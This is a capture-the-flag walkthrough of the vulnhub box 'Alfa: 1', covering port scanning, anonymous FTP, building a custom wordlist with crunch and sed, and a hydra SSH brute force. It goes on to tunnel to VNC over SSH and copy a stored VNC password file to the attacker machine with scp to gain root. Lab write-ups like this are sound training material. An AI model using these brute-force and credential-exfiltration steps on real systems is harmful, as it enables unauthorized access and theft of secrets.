Alfa: 1 is another awesome box on vulnhub. The difficulties of this box is Medium, and need to do Enumeration, Brute Force to get into the system. Here is the link,655/

-Brute Force
-Privilege Escalation


 #nmap -p- -sV 192.168.1.X 
 21/tcp       open       ftp           vsftpd 3.0.3
 80/tcp       open       http          Apache httpd 2.4.38 ((Debian))
 139/tcp     open  netbios-ssn    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp     open  netbios-ssn    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 65111/tcp open       ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 Service Info: Host: ALFA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

#ftp anonymous login allow

checked every single port, got ftp allowed anonymous user allow to login. after logged in into it got the directory name thomas (guess, it may be username) and get a image file named milo.jpg

#enumrate web service

Stuck at ftp service, try to enumerate http service, and after some directory fuzzing got nothing more than robots.txt after dig into robots.txt found brainfuck code

Simply decode it using and get /alfa-support

Visit /alfa-support and get hint about password

#crunch & sed

Create a custom wordlist with milo followed by 3 numerical digits

$crunch 3 3 1234567890 wordlist.txt

add milo as prefix using sed

$sed -i -e 's/^/milo/' wordlist.txt


as we have username thomas can bruteforce ssh service running on port number 65111 using hydra

$hydra -s 65111 -l thomas -P wordlist.txt 192.168.1.X -t 4 ssh


login via ssh and will get user.txt

#privilege escalation

run on machine and find out vnc service on port 5901 locally

here found same privilege escalation scenario

forward my local port 7000 (attacking machine) to port 5901 

$sudo ssh -L 7000:localhost:5901 [email protected] -p 65111

After attempting to connect, password required I tried milo666 as password but failed.


as i said same scenario for privilege escalation i also got .remote_secret password file, i simply copy that file from target to attacker box using scp

$scp .remote_secret [email protected]:/home/Desktop/secret

using -passwd option

$vncviewer -passwd secret

Successfully got root flag 🙂


Please enter your comment!
Please enter your name here